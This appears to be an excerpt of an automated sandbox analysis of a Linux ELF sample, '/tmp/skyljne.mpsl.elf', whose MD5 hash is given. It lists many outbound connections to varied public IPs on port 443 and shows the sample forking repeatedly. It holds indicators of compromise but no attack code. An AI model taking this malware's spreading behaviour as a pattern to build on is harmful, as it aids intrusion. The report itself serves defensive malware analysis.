                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26079192.168.2.144068279.36.25.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26080192.168.2.1455324104.161.110.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26081192.168.2.144713238.34.70.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26082192.168.2.1446370206.148.97.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26083192.168.2.1460830210.162.214.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26084192.168.2.145703059.191.137.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26085192.168.2.145466068.12.239.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26086192.168.2.1439066141.46.214.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26087192.168.2.1446976205.121.187.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26088192.168.2.1459914160.223.48.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26089192.168.2.1446022132.103.49.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26090192.168.2.145394034.144.58.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26091192.168.2.1456028212.172.191.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26092192.168.2.1460068147.81.87.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26093192.168.2.145106451.30.45.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26094192.168.2.143698875.252.18.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26095192.168.2.1436554213.221.95.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26096192.168.2.1433292108.68.167.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26097192.168.2.143380879.120.246.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26098192.168.2.1437928123.92.120.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26099192.168.2.1440684128.165.227.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26100192.168.2.143547443.66.228.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26101192.168.2.1452822110.149.60.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26102192.168.2.1434504108.249.172.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26103192.168.2.1448344112.230.241.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26104192.168.2.1434174186.9.248.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26105192.168.2.144840618.55.62.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26106192.168.2.1449988117.229.16.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26107192.168.2.145400496.234.204.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26108192.168.2.144724686.76.138.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26109192.168.2.1434348200.77.169.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26110192.168.2.1455544201.167.158.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26111192.168.2.145417491.140.94.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26112192.168.2.145174442.111.58.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26113192.168.2.144089888.214.179.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26114192.168.2.1454930197.185.5.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26115192.168.2.14583288.229.12.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26116192.168.2.143779078.117.150.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26117192.168.2.144063275.131.126.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26118192.168.2.1459022222.181.245.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26119192.168.2.1454694200.172.107.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26120192.168.2.1441694217.65.207.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26121192.168.2.145963423.112.155.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26122192.168.2.143819868.248.13.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26123192.168.2.1438444120.252.186.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26124192.168.2.1445948108.213.132.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26125192.168.2.1437476141.142.6.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26126192.168.2.1460624221.229.238.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26127192.168.2.1434968210.90.116.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26128192.168.2.144466632.233.149.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26129192.168.2.143930076.230.76.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26130192.168.2.1453152172.166.130.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26131192.168.2.1443360216.84.149.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26132192.168.2.1439300124.154.192.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26133192.168.2.1454278160.177.161.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26134192.168.2.1454300205.102.210.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26135192.168.2.1454536216.135.243.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26136192.168.2.1451234159.221.2.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26137192.168.2.14328802.204.5.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26138192.168.2.144293240.26.128.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26139192.168.2.1442184155.195.119.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26140192.168.2.144421644.27.188.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26141192.168.2.1440588119.230.185.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26142192.168.2.1439048220.22.7.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26143192.168.2.1435706203.254.44.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26144192.168.2.1458794115.246.50.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26145192.168.2.1435598219.80.192.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26146192.168.2.1444094140.225.72.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26147192.168.2.1460062133.23.211.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26148192.168.2.1448556182.26.23.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26149192.168.2.1441100101.151.135.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26150192.168.2.1459140206.145.241.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26151192.168.2.1440634178.54.236.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26152192.168.2.143825064.238.92.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26153192.168.2.1438386200.212.185.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26154192.168.2.1448258156.213.121.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26155192.168.2.1453190156.235.87.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26156192.168.2.1435838176.51.78.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26157192.168.2.1456884192.113.139.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26158192.168.2.143830836.49.31.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26159192.168.2.1445222197.62.233.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26160192.168.2.1438348183.139.116.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26161192.168.2.145059035.85.41.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26162192.168.2.145916877.224.145.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26163192.168.2.144173058.114.133.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26164192.168.2.145566692.119.89.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26165192.168.2.1443818184.18.11.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26166192.168.2.143779837.235.8.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26167192.168.2.145083047.83.80.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26168192.168.2.14575709.45.190.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26169192.168.2.1452772118.235.153.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26170192.168.2.1453302199.50.249.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26171192.168.2.1442006157.13.34.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26172192.168.2.145856648.147.245.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26173192.168.2.14393881.98.175.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26174192.168.2.1445210121.219.188.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26175192.168.2.1446232126.167.127.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26176192.168.2.144844220.235.159.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26177192.168.2.1450874180.26.209.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26178192.168.2.144345412.50.170.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26179192.168.2.1452142187.251.43.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26180192.168.2.143441088.222.152.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26181192.168.2.143350413.89.51.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26182192.168.2.1441300161.195.40.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26183192.168.2.1439650194.24.24.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26184192.168.2.145863480.245.104.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26185192.168.2.1454066116.218.141.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26186192.168.2.1438678115.172.231.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26187192.168.2.1456444105.75.221.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26188192.168.2.1433642143.54.9.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26189192.168.2.1449926150.238.191.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26190192.168.2.143600451.189.148.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26191192.168.2.144491440.29.58.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192192.168.2.144088641.237.94.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26193192.168.2.1437892176.66.153.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26194192.168.2.1432944187.1.82.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26195192.168.2.1435846134.127.241.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26196192.168.2.144109492.59.13.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26197192.168.2.1446258177.29.87.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26198192.168.2.1441698220.162.39.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26199192.168.2.143921025.5.98.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26200192.168.2.1455310104.112.106.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26201192.168.2.143751253.82.255.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26202192.168.2.1449886138.121.82.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26203192.168.2.143900282.240.212.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26204192.168.2.144864872.12.118.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26205192.168.2.1447718206.107.123.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26206192.168.2.145562268.217.55.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26207192.168.2.143340244.146.134.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26208192.168.2.146056067.190.251.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26209192.168.2.1435966120.193.56.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26210192.168.2.145762842.3.48.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26211192.168.2.144213247.118.152.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26212192.168.2.143407481.30.107.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26213192.168.2.144344291.151.226.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26214192.168.2.144944819.147.189.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26215192.168.2.1449408166.60.39.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26216192.168.2.14479982.182.238.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26217192.168.2.1436296106.135.247.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26218192.168.2.1458612172.171.87.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26219192.168.2.146045677.72.249.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26220192.168.2.144800868.146.89.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26221192.168.2.145443874.82.205.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26222192.168.2.145543425.103.254.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26223192.168.2.1456556137.188.6.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26224192.168.2.1443356208.138.247.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26225192.168.2.144283686.207.100.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26226192.168.2.1439556128.121.65.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26227192.168.2.1440496172.252.68.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26228192.168.2.1460226113.162.88.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26229192.168.2.1455590155.251.93.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26230192.168.2.1458988115.113.72.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26231192.168.2.145953447.20.193.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26232192.168.2.145486086.245.200.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26233192.168.2.146098851.67.41.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26234192.168.2.145271820.235.168.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26235192.168.2.14413084.217.31.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26236192.168.2.1450826113.181.107.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26237192.168.2.145303874.49.172.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26238192.168.2.1449236104.116.92.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26239192.168.2.1451020197.53.209.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26240192.168.2.145449690.52.102.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26241192.168.2.1459228167.118.58.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26242192.168.2.14510982.63.191.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26243192.168.2.1438632149.138.203.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26244192.168.2.1457266116.145.219.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26245192.168.2.1447810110.227.142.101443
                                      TimestampBytes transferredDirectionData


                                      System Behavior

                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:/tmp/skyljne.mpsl.elf
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:-
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:-
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:-
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9
                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:-
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9
                                      Start time (UTC):14:50:05
                                      Start date (UTC):14/01/2024
                                      Path:/tmp/skyljne.mpsl.elf
                                      Arguments:-
                                      File size:5773336 bytes
                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9
                                      Start time (UTC):14:50:06
                                      Start date (UTC):14/01/2024
                                      Path:/usr/libexec/gnome-session-binary
                                      Arguments:-
                                      File size:334664 bytes
                                      MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                      Start time (UTC):14:50:06
                                      Start date (UTC):14/01/2024
                                      Path:/bin/sh
                                      Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):14:50:06
                                      Start date (UTC):14/01/2024
                                      Path:/usr/libexec/gsd-print-notifications
                                      Arguments:/usr/libexec/gsd-print-notifications
                                      File size:51840 bytes
                                      MD5 hash:71539698aa691718cee775d6b9450ae2